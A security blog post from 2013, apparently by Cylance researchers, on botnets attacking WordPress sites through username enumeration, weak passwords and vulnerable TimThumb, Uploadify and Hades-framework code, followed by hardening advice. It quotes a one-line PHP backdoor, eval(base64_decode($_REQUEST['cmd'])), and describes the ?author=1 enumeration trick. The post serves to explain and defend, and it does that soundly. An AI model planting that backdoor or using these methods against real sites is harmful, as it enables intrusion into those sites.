WordPress Under Attack
By Aaron Bryson, Brian Wallace
WordPress under Attack (again)
Hackers are trying to break into your website 24/7.
In the last few weeks, Internet hacking attacks have increased and thousands of sites have already been compromised. Many security observers have seen 1,000,000s of scans of their WordPress installation on a single day in April, as noted by the Sucuri Blog on April 11, 2013 – see http://blog.sucuri.net/2013/04/the-wordpress-brute-force-attack-timeline.html.
One might wonder why anyone would want to break into a WordPress site. Many of the servers that run WordPress have traits that are quite valuable to attackers. One of these traits is that they very often have medium to high amounts of bandwidth available to them, as opposed to residential clients. This bandwidth can be used for a variety of things, including launching denial of service attacks against other servers, routing their traffic through and compromising other servers, and also serve as bots in botnets. We have also seen cases where these compromised servers have become what seem to be intermediary command and control centers for these botnets, communicating with a small subsection of the bots. The infected WordPress hosts can also be used to infect the visitors of the sites via security holes in their browsers, and can even be used to store payloads for an attack occurring between two other servers. Finally, WordPress hosts can be used as command and control traffic for targeted attacks to communicate in a fairly innocuous way but still be effective.
Hackers are exploiting weaknesses in WordPress sites to control the host and turn them into bots and collecting them into their botnet (a collection of networked, compromised computers) for numerous reasons but primarily to try to gain access to websites all over the world. Once a “clean” WordPress host is compromised, it joins the botnet as a zombie to do evil. Hackers can have their wicked way with your site, uploading files, changing content, and inject malware…all without your knowledge.
How are they getting in?
The most common way into your website is by guessing a username/password combination. Unlike a robber trying to pick a lock who may give up after multiple failed attempts or being discovered, botnets don’t give up. They don’t have to. Because typically no one is watching and even if they are, they don’t know what they are looking for, and if they are they rarely do anything about it when they find it. So the botnets just keep trying.
Attackers can use various methods to determine a probable username to use. The easiest way is to enumerate the user's information. This can be done by accessing the landing page of the WordPress with ?author=1(or any subsequent number that returns user information). Unless the WordPress users use different emails/usernames to login than the ones they supply in their personal description (which they rarely do), the attackers can use this information as a valid username. Can you figure out the first steps to disrupting the attack cycle here? Some methods of mitigating this issue are posted here: http://wordpress.org/support/topic/author1-2-3-how-to-stop-it
Once the username is determined, the attacker only need to rely on human weakness #1: poorly crafted password composition. Typical passwords that work well on WordPress sites are: username as password, the word “password”, “wordpress”, etc. Here is a list of username and password combinations used in a recent mass WordPress based brute force campaign: http://pastebin.com/raw.php?i=UTUsmPm6
Every time a botnet tries to login, they are using your server’s resources. When thousands of botnets are trying to log in at the same time, it can cause serious problems. Your site performance may slow down, or worse your web site becomes unavailable for your customers due to a denial-of-service caused by the consumption of your resources.
Another method is attacking the themes and plugins that are installed on the WordPress site. Plugins and themes allow you to change how WordPress works and looks. Some are created by the WordPress developers and some are created by third parties. Since they are not part of the WordPress core, they do not get nearly as much scrutiny as the core of WordPress gets when being vetted for security flaws. These themes and plugins can be obtained from the WordPress official web site or from third party web pages. In general, the themes and plugins on the official website are well maintained and utilize the built in WordPress update method. There are often cases where vulnerabilities are found in popular free official WordPress plugins that are then quickly patched and the users are notified that they need to update. For example, a recent case of this was when the W3 Total Cache plugin was found to have a critical vulnerability which allowed for an attack to remotely execute code on a WordPress server running the vulnerable version of the plugin. You can find more details here: http://wordpress.org/support/topic/w3-total-cache-critical-vulnerability-disclosed
What about plugins/themes from other sites?
The fact is, WordPress themes and plugins get less scrutiny. This is because most third party sites sell plugins and themes therefore making the source unavailable to anyone who does not pay for them. This makes it hard for legitimate security professionals to determine if they are vulnerable to attacks. This is only one part of the issue that leads to servers being compromised months or even years after the vulnerable code has been found and reported.
Many of these themes/plugins will use "frameworks" to enhance their functionality. However, frameworks are severely vulnerable to attacks, and once determined vulnerable, any theme/plugin found using this framework will then come under attack. In many cases, the developers of the frameworks will update the frameworks, but are unable to notify any of the developers using it directly and often end up being reported as vulnerabilities to the individual themes/plugins. For example, the reporting of vulnerable versions of plugins/themes that use Uploadify can be found reported here:
This would not be so bad if these plugins/themes were using an update system to notify users that they needed to update their version of the plugin/theme, or if the authors of the plugins/themes were able to directly contact the users of the affected clients – but they don’t, and probably won’t for many years to come.
One attack that comes across our honeypots everyday are ones trying to exploit a vulnerable version of the TimThumb framework (https://code.google.com/p/timthumb/). This framework is used to create thumbnail versions of remote images so they can be displayed in a smaller form without needing the full bandwidth of the image. Sounds safe enough, right? This framework contained a flaw in multiple versions which allowed an attacker to supply a fake image which had PHP code inside of it, which was then written to a cache folder. The attacker could then access this file (stored with a .php extension) in the cache folder as the naming convention was predictable, and execute their code on the remote server. Does this sound familiar to anyone? Standard input validation attack made popular in the early 2000’s with eBay. This technique allows for remote commands to be run, other malware to be installed, and often leads to the target machine becoming a member of a botnet. Different intervals of this attack require different resources to exploit, but the process now seems to be completely automated for more advanced attackers. The attackers create compromised domains (youtube.com.somewebsite.com) that point to a server that they have compromised that holds the payload. The payload contains enough header information to seem like an image to TimThumb, but then contains encoded/obfuscated code to compromise the server. These payloads are retrieved as images, then saved to the cache, allowing for the attackers to access the cached payload, executing the code.
A collection of these payloads are collected and decoded on a site maintained by Cylance Researcher Brian Wallace (https://defense.ballastsecurity.net/decoding/index.php). A prime example of one of these payloads that was found is referred to as a RA1NX bot, which infects the target server then joins a botnet. Upon finding this sample of the RA1NX bot (https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0), Brian found and developed the following metasploit module, allowing for attacks to be launched against the botnet (https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb) by circumventing authentication methods defined in the bots code.
Similar methods are used (often the same payloads) to attack a framework called Uploadify, except the primary difference is that this plugin allows for unauthenticated uploading of files to the server, again with a predictable location of where it is stored, allowing for the code in the file to be executed. This framework is used in more than just WordPress plugins/themes, allowing for attackers to successfully attack any software that uses a vulnerable version of it.
Cylance researcher, Brian Wallace found versions of another framework which are vulnerable. Late last year, he reported a vulnerability in the Archin WordPress theme. This vulnerability allowed for unauthenticated users to change and add values to WordPress's configuration database. The potential scope for this attack is large, as plugins and the WordPress core use this database. To show the danger of the attack, his proof of concept utilized the vulnerability to change the default user type to administrator, then allows anyone to register (http://packetstormsecurity.com/files/117009/WordPress-Archin-Theme-Unauthenticated-Configuration-Access.html). This allows the attacker to register and become an administrator. From there, they can change files, lock out administrators, and create backdoors to use in further exploitation of the server. Originally, this vulnerability was only thought to be in Archin, but various other plugins/themes that use the "Hades framework" were also vulnerable to this attack (ones that contain ajax.php in the option_panel directory). After speaking with the developer about this, he updated Archin to mitigate the vulnerability. If you use this theme or any plugin/theme that uses hades_framework, you should check for updates and install them as soon as you can.
The attacks above rely on the frameworks' lack of reliable authentication verification. In most cases of these attacks, files are written or modified as the web user and can be used to further exploit the server and/or attack other servers. In many cases, the modifications to files can be extremely small, only requiring the addition of code like: eval(base64_decode($_REQUEST['cmd']));
This single code line is incredibly lucrative for the attacker as it allows any command to be run on the targeted system through a simple HTTP POST command.
We have seen major distributed denial of service attacks launched from injected backdoors using almost the exact same code. We have seen this method used in the exploitation of more than just WordPress servers, but also with Joomla and other CMS platforms. This sort of backdoor allows the attacker to execute any PHP code they supply to the backdoor, making it more difficult than usual to determine the intended fate of the compromised machine as well as to quickly use the backdoored server for any need they might have. Although, with the lack of authentication, anyone that can find said backdoor can use it.
What you can do to protect yourself from hackers?
There are a few things you can do to protect your WordPress site secure from hackers:
- Change your username / account (avoid the “admin” and “administrator” usernames)
- Change your passwords frequently
- Install WordPress security plugins and take advantage of their features
- Update WordPress, plugins, and themes regularly
- Two-factor options
1. Change Your Username / Account
Do not use the default “Admin” account that is created with a new WordPress install. Most of the brute-force attacks target this username. Simply changing it to a unique username will increase your protection.
Here’s how to do it:
- Login into your WordPress admin panel using your administrator account.
Select the Users area from your dashboard sidebar.
- Click on “Add New User”.
Fill in the form and choose Administrator from the Role drop down list. You will need to use a different email address than the one currently linked to your website.
- When finished, click Add New User.
- Log out of WordPress.
- Log in with your new WordPress admin username.
- Navigate back to the Users menu from the Dashboard.
Delete the previous Admin account.
- Next, you will be asked about the articles posted under the previous Admin username.
- Select the option Attribute all posts and links to: and select your new username.
- When ready click “Confirm Deletion”.
It’s important to use common sense when you are choosing your display name. Make sure that it is different than the username. This is important for all users but exceptionally so for those with admin power.
2. Choose a secure password
As you can see, there are only so many password combinations in the world. Unfortunately, most people reuse the same password because they are too lazy to make unique passwords for each and every account they have. If any of your passwords are on the above list, or on the list of the 25 most common passwords of 2012, change them now.
Your new password should contain:
- Lower and upper case letters
- Lots of characters
However, the most important factor of a password is length. Ideally, your password is 12+ characters. The longer and more complex the password is, the harder it is to crack.
If the thought of remembering long complex passwords makes you cringe, don’t worry…you can use a password management tool so you only have to remember one secure password. Here are the top three popular password management tools that will help keep your passwords secure:
3. Install WordPress Security Plugins
WordPress Security plugins are great because:
- They offer point-and-click security
- They are usually free
- User and noob friendly
- Full of advanced security features
Here are some great plugins. There are many out there, focus on ones that are updated regularly and have great reviews:
- Akismet (to prevent spam)
- Better WP Security (advanced, easy-to-use security features)
- Wordfence Security (WordPress firewall and anti-virus plugin)
- WordPress Attack Scanner (WordPress Firewall and IPS, written by Brian Wallace of Cylance & Tom Cope of Tick Tock Computers)
- Duo for WordPress – (Two-factor authentication)
4. Update Everything
Maintaining up-to-date WordPress core, themes, and plugins is vital because updates often contain security patches. If you have multiple blogs, have a lot of plugins, or do not have the time to login frequently to check for updates, I suggest automating this process through the use of WP plugins:
- WP Updates Notifier (get notified via email when there are updates)
- Automatic Updater (make sure to automatically backup daily)
Some third party plugins do not use the built in WordPress update system and may require you to check the site you downloaded/purchased them for updates.
I think my site has been hacked. Now what?
Talk to your hosting company. They will have insight into the server and error logs to begin investigating the attack.
A good hosting company will provide:
- Post-hack support
- Additional security
- Automatic website backup
If you find out that you have been hacked, call your hosting company. If you determine further investigation is desired, call an experienced cyber security company.
Is WordPress Safe?
Yes! At its core, WordPress can be a very secure content management system (CMS), however it does require proper configuration and setup, as well as regular updates. If security of your WordPress website is a serious concern, consider only using themes, plugins, and frameworks that have performed due diligence in securing and testing their code. We suggest doing a little research to determine if you are comfortable with the level of risk when using a new theme, plugin, or framework.
Follow these basic best practices, and you will have better protection.
Have you ever been hacked? What do you do to keep your website secure? We’d like to hear about it!
Security Researcher/Software Developer